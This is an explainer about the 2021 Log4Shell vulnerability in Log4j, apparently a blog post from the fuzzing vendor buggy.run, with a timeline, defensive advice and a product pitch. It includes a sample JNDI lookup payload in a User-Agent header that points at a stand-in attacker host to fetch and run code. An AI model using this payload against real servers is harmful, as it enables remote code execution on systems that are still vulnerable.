Remote code executionCVE-2021-442282021 6 min read

What was Log4Shell?

Log4j logged a string. That string told Log4j to reach out, fetch code, and run it. One log line, and an attacker owned the server. No account needed, and nearly every Java app was in range.

1 string
to go from a log line to running code
Hours
from disclosure to mass scanning
Millions
of servers running a vulnerable Log4j
0
authentication, just a value that got logged

What happened

In December 2021 the world learned that Log4j, a logging library sitting inside a huge share of Java software, would execute attacker code on command. Logging is supposed to be the safe, boring part of an app. This made it the front door.

The catch was that Log4j did more than write text. If a logged string contained a special lookup, Log4j would act on it, including reaching out to a server the attacker controlled and loading code from it.

How a log line ran code

Apps log all kinds of user input: usernames, headers, search terms. If any of that reached Log4j and contained a JNDI lookup, Log4j followed it. The lookup pointed at the attacker's server, which answered with a malicious Java class, and the app ran it.

So the attacker did not need to break in. They just needed to get a string logged. A username field, a User-Agent header, a chat message. Anything that ended up in a log was a way in.

The payload was just a value the app would log
User-Agent: ${jndi:ldap://attacker.example/x}

// Log4j sees the lookup, contacts attacker.example,
// downloads a Java class, and executes it.

Why it spread to everything

Log4j is a dependency of a dependency of a dependency. Most teams had it without knowing, buried under frameworks they did not write. There was no single product to patch, just a flaw hiding all over the stack.

Because the trigger was so simple, mass scanning started within hours of disclosure. Defenders were not racing a future exploit. They were racing one that was already hitting them.

How it unfolded

  1. Nov 24, 2021
    The flaw is privately reported to the Apache Log4j team.
  2. Dec 9, 2021
    Details and a working exploit go public. Mass exploitation begins.
  3. Dec 10, 2021
    A patch ships, but every affected app has to find and update its own copy.
  4. Dec 2021
    Follow-up CVEs and bypasses keep teams patching for weeks.
Where buggy.run fits

Log4Shell hid in ordinary input that happened to reach a log. You only see it by sending the inputs your app accepts and watching what your services do next.

buggy.run fuzzes the inputs your app actually exposes and captures the traffic that follows, so a request that makes your server reach out to somewhere it should not is exactly the kind of thing it surfaces.

What to take away

  • Keep a real inventory of your dependencies, including the ones you inherited.
  • Patch fast when a core library is hit, and assume you were probed before you finished.
  • Do not trust input just because it is only being logged. Logs are code paths too.
  • Restrict outbound network access from your servers so a single request cannot pull code in.

Find your unnoticed bug before someone else does.

buggy.run signs in, captures your real traffic, and hunts the quiet flaws that scanners miss. You get every finding in plain English with the fix.